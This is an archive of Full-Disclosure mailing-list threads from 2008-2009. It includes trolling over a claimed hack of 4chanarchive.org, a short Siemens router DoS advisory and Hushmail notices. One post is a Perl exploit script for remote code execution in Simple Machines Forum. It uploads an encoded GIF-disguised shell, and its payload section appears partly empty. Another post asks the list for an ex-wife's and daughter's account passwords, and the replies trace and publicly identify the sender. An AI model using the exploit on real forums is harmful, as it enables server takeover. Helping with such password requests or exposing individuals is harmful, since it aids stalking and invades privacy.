
> Send Full-Disclosure mailing list submissions to
>full-disclosure@lists.grok.org.uk
>
> To subscribe or unsubscribe via the World Wide Web, visit
>https://lists.grok.org.uk/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
>full-disclosure-requ...@lists.grok.org.uk
>
> You can reach the person managing the list at
>full-disclosure-ow...@lists.grok.org.uk
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
>
>
> Note to digest recipients - when replying to digest posts, please trim your
> post appropriately. Thank you.
>
>
> Today's Topics:
>
>   1. (no subject) (anti sec)
>   2. Re: (no subject) (Ed Carp)
>   3. Re: (no subject) (anti...@hushmail.com)
>   4. Re: (no subject) (Rob Fuller)
>   5. Re: Update: [GSEC-TZO-44-2009] One bug to rulethem all -
>  Firefox, IE, Safari, Opera, Chrome, Seamonkey,iPhone, iPod, Wii,
>  PS3 (Andrew Farmer)
>
>
> --------------
>
> Message: 1
> Date: Tue, 21 Jul 2009 20:27:38 -0500
> From: "anti sec" 
> Subject: [Full-disclosure] (no subject)
> To: full-disclosure@lists.grok.org.uk
> Message-ID: <20090722012738.4a82fbe4...@ws1-9.us4.outblaze.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> We, the worldwide anti-sec movement have landed yet another coup that
> will strike full-disclosurizers into the very hearts and soul of their
> being.
>
> Fellow anti-sec'ers and freedom-lovers: Rejoice, for it is time to take
> revenge against the full disclosure zionist hegemony in retaliation for
> the damage white hats? have been committing against the security world.
> Our heroic anti-sec warriors have carried out a blessed raid against
> 4chanarchive.org. 4chan users are now burning with fear, terror and panic
> on their /b/, /gif/, /r9k/, and /a/ boards.
>
> The white hat world will soon be asunder and the enemies will flee from
> our holy power!
>
> We have repeatedly warned the security industry and the people in it. DO
> NOT FUCK WITH ANTI-SEC! Statistically speaking, every white hat is using
> 4chan or at least has heard of it. Thus we struck into the very core of
> their existence. We have fulfilled our promise and carried out our
> blessed hacking attack on 4chanarchive after our warriors exerted
> strenuous efforts over a long period of time to ensure the success of the
> attack.
>
> We continue to warn the websites of governmentsecurity and hackforums and
> all full disclosure public as a whole that they will be punished in the
> same way if they do not withdraw from their erroneous ways of living and
> see that white hats are the scum of the earth. Those who warn are
> excused.
>
> The list will be released at the usual places. those in the know do
> realize where that is.
>
> ANTI-SEC FOR LIFE!
>
> --
> How Strong is Your Score?
> Click here to see yours for $0!
> By FreeCreditReport.com
>
> -- next part ------
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090721/e9123ac2/attachment-0001.html
>
> --
>
> Message: 2
> Date: Tue, 21 Jul 2009 20:39:48 -0500
> From: Ed Carp 
> Subject: Re: [Full-disclosure] (no subject)
> To: full-disclosure 
> Message-ID:
><1b0d006c0907211839l3e605edekf8e3dd19b6aa4...@mail.gmail.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Do not fuck with anti-suck.  LOL!
> -- next part --
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090721/5d4e492b/attachment-0001.html
>
> --
>
> Message: 3
> Date: Tue, 21 Jul 2009 21:56:07 -0400
> From: anti...@hushmail.com
> Subject: Re: [Full-disclosure] (no subject)
> To: full-disclosure@lists.grok.org.uk, anti-sec4l...@email.com
> Message-ID: <20090722015607.95b1d20...@smtp.hushmail.com>
> Content-Type: text/plain; charset="UTF-8"
>
> Awww, seriously? Can you leave governmentsecurity alone? I don't
> want you fucking with my backdoorz. It's not my fault they run
> litespeed.
>
> On Tue, 21 Jul 2009 21:27:38 -0400 anti sec  sec4l...@email.com> wrote:
> >We, the worldwide anti-sec movement have landed yet another coup
> >that
> >will strike full-disclosuri

Re: [Full-disclosure] (no subject)

2009-07-22 Thread Christophe Delondre
because those poor guys don't know what NSA or crime syndicates are ...

because those poor guys don't know what's outside of their room ...

my dear 'anti-sec', open the door of your home and take a look outside ... do 
you really think we need skiddies like you in these (economic) crisis times ?

. what about going back to school and learn basics of 'living in society' ?

or you can continue on your way, personally you're the sun which makes me laugh 
during these poor project-end days ...


ps : have a sex time, it helps ;)

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of 
valdis.kletni...@vt.edu
Sent: mercredi 22 juillet 2009 15:46
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] (no subject)

On Tue, 21 Jul 2009 20:27:38 CDT, anti sec said:
> Our heroic anti-sec warriors have carried out a blessed raid against 
> 4chanarchive.org. 4chan users are now burning with fear, terror and 
> panic on their /b/, /gif/, /r9k/, and /a/ boards.

Great. Now you pissed off anon.  Why didn't you pick on something *safe*, like 
the NSA or the Russian crime syndicates?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2009-07-22 Thread Christophe Delondre
because those poor guys don't know what NSA or crime syndicates are ...

because those poor guys don't know what's outside of their room ...

my dear 'anti-sec', open the door of your home and take a look outside ... do 
you really think we need skiddies like you in these (economic) crisis times ?

. what about going back to school and learn basics of 'living in society' ?

or you can continue on your way, personally you're the sun which makes me laugh 
during these poor project-end days ...


ps : have a sex time, it helps ;)

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of 
valdis.kletni...@vt.edu
Sent: mercredi 22 juillet 2009 15:46
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] (no subject)

On Tue, 21 Jul 2009 20:27:38 CDT, anti sec said:
> Our heroic anti-sec warriors have carried out a blessed raid against 
> 4chanarchive.org. 4chan users are now burning with fear, terror and 
> panic on their /b/, /gif/, /r9k/, and /a/ boards.

Great. Now you pissed off anon.  Why didn't you pick on something *safe*, like 
the NSA or the Russian crime syndicates?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2009-07-22 Thread Valdis . Kletnieks
On Tue, 21 Jul 2009 20:27:38 CDT, anti sec said:
> Our heroic anti-sec warriors have carried out a blessed raid against
> 4chanarchive.org. 4chan users are now burning with fear, terror and panic
> on their /b/, /gif/, /r9k/, and /a/ boards.

Great. Now you pissed off anon.  Why didn't you pick on something *safe*,
like the NSA or the Russian crime syndicates?


pgpC2P8M8Q0Zo.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2009-07-22 Thread wishi
Hmmh,

I personally see a lack of defense and a need for more white hats, who
aren't constantly trying to gain media attention by breaking stuff. -
Because most stuff is already broken - as we see. Even trolls nowadays
can course some damage.
If you need a good example to proof that we need new security concepts,
look at what even idiots can do. And sell this as a good argument, for
sure!! ;) My 5 year old niece could have hacked this 4chan site.

I'm still waiting for this so called ssh thingy. Hack something real:
release an OpenSSH patch.


Have fun,
wishi


Ed Carp schrieb:
> Do not fuck with anti-suck.  LOL!
>
>
> 
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] (no subject)

2009-07-21 Thread Rob Fuller
I'm sorry, log time reader of FD, it's a great mashup of hilarity and vuln
disclosure. But this takes the cake. I can't sit silent for this one:

Are you OUTSIDE your mind? 4chan? and not even 4chan.org, an archive site.
This is the "very core" of the "White Hat" being? If this is truly a 'agent
of AntiSec' which I highly doubt, you must be selecting low hanging fruit
and finding any possible way to associate it with those you hate.

I hope those who are in Anti-Sec if there really is such a thing, come and
hunt you down... and that's the way it is... for July 21st, 2009

--
Rob Fuller | Mubix
Room362.com | Hak5.org | TheAcademyPro.com


On Tue, Jul 21, 2009 at 9:39 PM, Ed Carp  wrote:

> Do not fuck with anti-suck.  LOL!
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2009-07-21 Thread antisex
Awww, seriously? Can you leave governmentsecurity alone? I don't 
want you fucking with my backdoorz. It's not my fault they run 
litespeed.

On Tue, 21 Jul 2009 21:27:38 -0400 anti sec  wrote:
>We, the worldwide anti-sec movement have landed yet another coup 
>that
>will strike full-disclosurizers into the very hearts and soul of 
>their
>being.
>
>Fellow anti-sec'ers and freedom-lovers: Rejoice, for it is time to 
>take
>revenge against the full disclosure zionist hegemony in 
>retaliation for
>the damage white hats  have been committing against the security 
>world.
>Our heroic anti-sec warriors have carried out a blessed raid 
>against
>4chanarchive.org. 4chan users are now burning with fear, terror 
>and panic
>on their /b/, /gif/, /r9k/, and /a/ boards.
>
>The white hat world will soon be asunder and the enemies will flee 
>from
>our holy power!
>
>We have repeatedly warned the security industry and the people in 
>it. DO
>NOT FUCK WITH ANTI-SEC! Statistically speaking, every white hat is 
>using
>4chan or at least has heard of it. Thus we struck into the very 
>core of
>their existence. We have fulfilled our promise and carried out our
>blessed hacking attack on 4chanarchive after our warriors exerted
>strenuous efforts over a long period of time to ensure the success 
>of the
>attack.
>
>We continue to warn the websites of governmentsecurity and 
>hackforums and
>all full disclosure public as a whole that they will be punished 
>in the
>same way if they do not withdraw from their erroneous ways of 
>living and
>see that white hats are the scum of the earth. Those who warn are
>excused.
>
>The list will be released at the usual places. those in the know 
>do
>realize where that is.
>
>ANTI-SEC FOR LIFE!
>
>-- 
>How Strong is Your Score?
>Click here to see yours for $0!
>By FreeCreditReport.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2009-07-21 Thread Ed Carp
Do not fuck with anti-suck.  LOL!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2009-07-21 Thread anti sec
We, the worldwide anti-sec movement have landed yet another coup that
will strike full-disclosurizers into the very hearts and soul of their
being.

Fellow anti-sec'ers and freedom-lovers: Rejoice, for it is time to take
revenge against the full disclosure zionist hegemony in retaliation for
the damage white hats  have been committing against the security world.
Our heroic anti-sec warriors have carried out a blessed raid against
4chanarchive.org. 4chan users are now burning with fear, terror and panic
on their /b/, /gif/, /r9k/, and /a/ boards.

The white hat world will soon be asunder and the enemies will flee from
our holy power!

We have repeatedly warned the security industry and the people in it. DO
NOT FUCK WITH ANTI-SEC! Statistically speaking, every white hat is using
4chan or at least has heard of it. Thus we struck into the very core of
their existence. We have fulfilled our promise and carried out our
blessed hacking attack on 4chanarchive after our warriors exerted
strenuous efforts over a long period of time to ensure the success of the
attack.

We continue to warn the websites of governmentsecurity and hackforums and
all full disclosure public as a whole that they will be punished in the
same way if they do not withdraw from their erroneous ways of living and
see that white hats are the scum of the earth. Those who warn are
excused.

The list will be released at the usual places. those in the know do
realize where that is.

ANTI-SEC FOR LIFE!

-- 
How Strong is Your Score?
Click here to see yours for $0!
By FreeCreditReport.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2009-07-01 Thread James Rankin
What a goon. That made me laugh till it hurt

2009/7/1 Tomas L. Byrnes 

> Reported to the Douglas County Sheriffs on their crime report form.
>
>
> >-Original Message-
> >From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-
> >boun...@lists.grok.org.uk] On Behalf Of Kevin Wilcox
> >Sent: Wednesday, July 01, 2009 6:32 AM
> >To: Inbox (Main)
> >Cc: full-disclosure@lists.grok.org.uk; michelle.nash2...@yahoo.com;
> >mitch nash
> >Subject: Re: [Full-disclosure] (no subject)
> >
> >2009/7/1 Inbox (Main) :
> >>
> >> Why not just ask michelle?
> >>
> >> Hope you don't mind: I forwarded your mail to
> >michelle.nash2...@yahoo.com
> >
> >I'm guessing this could have something to do with it:
> >
> >http://www.nrtoday.com/article/20090619/LOGS/906199976/1051/NONE&parentp
> >rofile=1055
> >
> >In particular, the section that says,
> >
> >"Mitchell Dale Nash, 45, of Myrtle Creek, on suspicion of violation of
> >a restraining order, interfering with making a report, harassment and
> >unlawful entry into a motor vehicle."
> >
> >I only mention that because the original email came in from
> >74.32.173.24...which gives us
> >
> >u...@host ~ $ nslookup 74.32.173.24
> >Server: 152.10.248.1
> >Address:152.10.248.1#53
> >
> >Non-authoritative answer:
> >24.173.32.74.in-addr.arpa   name =
> >74-32-173-24.dr01.myck.or.frontiernet.net.
> >
> >My favourite part is the "myck.or.frontiernet.net" section. Sounds
> >like Myrtle Creek, Oregon, to me.
> >
> >Of course, I could be *completely* wrong...
> >
> >kmw
> >
> >--
> >To take from one, because it is thought that his own industry and that
> >of his fathers has acquired too much, in order to spare to others,
> >who, or whose fathers have not exercised equal industry and skill, is
> >to violate arbitrarily the first principle of association, ‘the
> >guarantee to every one of a free exercise of his industry, & the
> >fruits acquired by it.'
> >
> >___
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >Hosted and sponsored by Secunia - http://secunia.com/
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2009-07-01 Thread Tomas L. Byrnes
Reported to the Douglas County Sheriffs on their crime report form.


>-Original Message-
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-
>boun...@lists.grok.org.uk] On Behalf Of Kevin Wilcox
>Sent: Wednesday, July 01, 2009 6:32 AM
>To: Inbox (Main)
>Cc: full-disclosure@lists.grok.org.uk; michelle.nash2...@yahoo.com;
>mitch nash
>Subject: Re: [Full-disclosure] (no subject)
>
>2009/7/1 Inbox (Main) :
>>
>> Why not just ask michelle?
>>
>> Hope you don't mind: I forwarded your mail to
>michelle.nash2...@yahoo.com
>
>I'm guessing this could have something to do with it:
>
>http://www.nrtoday.com/article/20090619/LOGS/906199976/1051/NONE&parentp
>rofile=1055
>
>In particular, the section that says,
>
>"Mitchell Dale Nash, 45, of Myrtle Creek, on suspicion of violation of
>a restraining order, interfering with making a report, harassment and
>unlawful entry into a motor vehicle."
>
>I only mention that because the original email came in from
>74.32.173.24...which gives us
>
>u...@host ~ $ nslookup 74.32.173.24
>Server: 152.10.248.1
>Address:152.10.248.1#53
>
>Non-authoritative answer:
>24.173.32.74.in-addr.arpa   name =
>74-32-173-24.dr01.myck.or.frontiernet.net.
>
>My favourite part is the "myck.or.frontiernet.net" section. Sounds
>like Myrtle Creek, Oregon, to me.
>
>Of course, I could be *completely* wrong...
>
>kmw
>
>--
>To take from one, because it is thought that his own industry and that
>of his fathers has acquired too much, in order to spare to others,
>who, or whose fathers have not exercised equal industry and skill, is
>to violate arbitrarily the first principle of association, ‘the
>guarantee to every one of a free exercise of his industry, & the
>fruits acquired by it.'
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2009-07-01 Thread Kevin Wilcox
2009/7/1 Inbox (Main) :
>
> Why not just ask michelle?
>
> Hope you don't mind: I forwarded your mail to michelle.nash2...@yahoo.com

I'm guessing this could have something to do with it:

http://www.nrtoday.com/article/20090619/LOGS/906199976/1051/NONE&parentprofile=1055

In particular, the section that says,

"Mitchell Dale Nash, 45, of Myrtle Creek, on suspicion of violation of
a restraining order, interfering with making a report, harassment and
unlawful entry into a motor vehicle."

I only mention that because the original email came in from
74.32.173.24...which gives us

u...@host ~ $ nslookup 74.32.173.24
Server: 152.10.248.1
Address:152.10.248.1#53

Non-authoritative answer:
24.173.32.74.in-addr.arpa   name =
74-32-173-24.dr01.myck.or.frontiernet.net.

My favourite part is the "myck.or.frontiernet.net" section. Sounds
like Myrtle Creek, Oregon, to me.

Of course, I could be *completely* wrong...

kmw

-- 
To take from one, because it is thought that his own industry and that
of his fathers has acquired too much, in order to spare to others,
who, or whose fathers have not exercised equal industry and skill, is
to violate arbitrarily the first principle of association, ‘the
guarantee to every one of a free exercise of his industry, & the
fruits acquired by it.'

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2009-07-01 Thread James Matthews
LAMO! This is amazing! It made my day! You stupid stalker get a life and
stay away from women!

James

On Wed, Jul 1, 2009 at 3:06 PM, Inbox (Main)  wrote:

>
> Why not just ask michelle?
>
> Hope you don't mind: I forwarded your mail to michelle.nash2...@yahoo.com
>
>
> 2009/7/1 mitch nash 
>
>> would like passwords for e mail, facebook, and my space for
>> michelle.nash2...@yahoo.com, and my space passwords for marlee_michelle.
>> (x wife and daughter) thank you, mitch nash
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://www.goldwatches.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2009-07-01 Thread Inbox (Main)
Why not just ask michelle?

Hope you don't mind: I forwarded your mail to michelle.nash2...@yahoo.com


2009/7/1 mitch nash 

> would like passwords for e mail, facebook, and my space for
> michelle.nash2...@yahoo.com, and my space passwords for marlee_michelle.
> (x wife and daughter) thank you, mitch nash
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2009-06-30 Thread mitch nash
would like passwords for e mail, facebook, and my space for 
michelle.nash2...@yahoo.com, and my space passwords for marlee_michelle. (x 
wife and daughter) thank you, mitch nash


  ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2009-06-29 Thread mitch nash
mtchn...@yahoo.com


  ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2009-03-22 Thread benkei
Siemes Gigaset SE461 WiMAX router remote dos

Date : 2008-02-08
Vendor   : Siemens
Affected product : Gigaset SE461 WiMAX router
Firmware version : 1.5-BL024.9.6401
Type : Denial of Service

There is an error in the referenced device that causes
it to restart. This condition can be triggered by specially
crafted web content or by issuing a connection from the lan interface
to the affected device on port 53. Sometimes it even looses
the configuration for the wan interface (ip, gateway, dns, etc.).

More information about this software defect can be found at
http://helith.net/txt/siemens_gigaset_se461_wimax_router_remote_dos.txt

Regards,
benkei

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] (no subject)

2009-02-11 Thread Dirk Reimers

<> .org is now being affected as well.
<>
<
http://www.gmx.net/de/go/multimessenger01

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] (no subject)

2009-01-27 Thread Tribal MP
Hi,

I found that service Flaw on November, i contact them and drop away.

Yesterday i was going to burn a cd with tons of txt and found that to
be relevant for a disclosure.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] No subject

2008-11-05 Thread elmysterio
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ANOTHER SMF Code Execution 0day!?  Good Lord...


#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!
# @descp: In loving memory of the rare bone marrow disease that
killed rgod.
# We can't thank you enough for killing a bug killer.
# @bug  : Sources/QueryString.php  & Sources/Themes.php w/
magic_quotes == Off
# @gr33t: m0rt's failure,  it never stops.
#
# C:\Documents and Settings\molest>perl
P:\advisories\smf\smf_localfileinclude.pl
# -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [EMAIL PROTECTED] ver
#
# Microsoft Windows XP [Version 5.1.2600]
#
# [EMAIL PROTECTED]
#
#  FOR LULZ PURPOSE ONLY!!
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);

print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";

my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla
FireFox" );
my %parms = (   s => "",
d => 0,
x => sub { print "[**] Proxy found, using $_[1]\n"; $ua-
>proxy(['http'], $_[1]); },
u => "Gl0ria!!!",
p => "[EMAIL PROTECTED]" );

GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s";

if( !$parms{s} ) {
die <
[-s]Site-> http://site.com/forums
[-x]Proxy   -> localhost:8118
[-u]Username-> Gl0ria!!!
[-p]Password-> [EMAIL PROTECTED]
[-d]Debug
HELP
}

my $shell =
chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).

chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).

chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).

chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).

chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).

chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).

chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).

chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).

chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).

chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).

chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).

chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).

chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00); $shell .= <<'EXIF';

EXIF
$shell .= 
chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).

chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).

chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).

chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).

chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).

chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).

chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).

chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).

chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).

chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).

chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).

chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).

chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).

chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).

chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).

chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).

chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
 

Re: [Full-disclosure] (no subject)

2008-08-14 Thread Valdis . Kletnieks
On Wed, 13 Aug 2008 10:18:13 -, [EMAIL PROTECTED] said:

> Is it safe to follow the link in this email?
> 
> Yes, it is safe to visit the Hushmail web site by following the link
> provided.

Which is, of course, what any miscreant who wanted you to visit a site that
will drop malware into your browser would say.

The risk is mitigated quite a bit for *this* e-mail because the link is in
a text/plain, so you're either cut-n-pasting the link and can see where you're
going, or your MUA has linkified it but you still can see the actual target.

Unfortunately, most users can't tell the difference between a link in a
text/plain and http://127.0.0.1";>http://www.goodstuff.com (and
you probably should double-check what your MUA did with the above line :)


pgpoTQqU7aK3y.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (no subject)

2008-08-14 Thread Ureleet
dear ff,

u suck.  die.

that is all.

On Wed, Aug 13, 2008 at 6:18 AM,  <[EMAIL PROTECTED]> wrote:
> [EMAIL PROTECTED] has sent you a secure email using Hushmail. To read it,
> please visit the following web page:
>
> https://www.hushmail.com/express/4JS7VCHT
>
> Frequently Asked Questions:
>
> Why did I receive this email?
>
> You have received this email because you have been sent a secure email
> through Hushmail. To read your secure email, you must follow the link
> provided and correctly answer a secret question chosen by the sender.
>
> What is a secure email?
>
> Sending a regular email is like sending a postcard - it may be read by any
> number of people before reaching its recipient(s). A secure email is like
> sending a letter in a sealed envelope - it can only be read by the sender
> and intended recipient(s).
>
> Is it safe to follow the link in this email?
>
> Yes, it is safe to visit the Hushmail web site by following the link
> provided in this email. However, you should never open an email attachment
> unless you know the person who sent it, were expecting to receive the file
> from them, and have scanned the file for viruses.
>
> When you arrive at the Hushmail web site, be sure to check the following:
>
> The address bar of your web browser shows: https://www.hushmail.com/express/
> A small picture of a padlock appears in the bottom right corner of your web
> browser
>
> If you would prefer to access your message by entering its message code,
> please visit the following web page: https://www.hushmail.com/express. You
> will be asked to enter the following message code: 4JS7 VCHT
>
> What is Hushmail?
>
> Hushmail is a web-based email service that lets you send and receive email
> in total security using OpenPGP standard algorithms. These algorithms,
> combined with Hushmail's unique key management system, provide unrivalled
> levels of security. Hushmail's encryption is automatic, transparent, and
> seamless - no special computer skills are required.
>
> How do I create a free Hushmail account?
>
> You can create a free Hushmail account by clicking on the following link:
> https://www.hushmail.com/
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] (no subject)

2008-08-13 Thread ff0000
Title: Hushmail Express










[EMAIL PROTECTED] has sent you a secure email
using Hushmail. To read it, please visit the following web page:


https://www.hushmail.com/express/4JS7VCHT




Frequently Asked Questions:


Why did I receive this email?

You have received this email because you have been sent a secure email through Hushmail. To read your secure email, you must follow the link provided and correctly answer a secret question chosen by the sender.


What is a secure email?

Sending a regular email is like sending a postcard - it may be read by any number of people before reaching its recipient(s). A secure email is like sending a letter in a sealed envelope - it can only be read by the sender and intended recipient(s).


Is it safe to follow the link in this email?

Yes, it is safe to visit the Hushmail web site by following the link provided in this email. However, you should never open an email attachment unless you know the person who sent it, were expecting to receive the file from them, and have scanned the file for viruses.
When you arrive at the Hushmail web site, be sure to check the following:

The address bar of your web browser shows: https://www.hushmail.com/express/

A small picture of a padlock appears in the bottom right corner of your web browser


If you would prefer to access your message by entering its message
code, please visit the following web page: https://www.hushmail.com/express.
You will be asked to enter the following message code: 4JS7 VCHT


What is Hushmail?

Hushmail is a web-based email service that lets you send and receive email in total security using OpenPGP standard algorithms.  These algorithms, combined with Hushmail's unique key management system, provide unrivalled levels of security.


Hushmail's encryption is automatic, transparent, and seamless - no special computer skills are required.


How do I create a free Hushmail account?

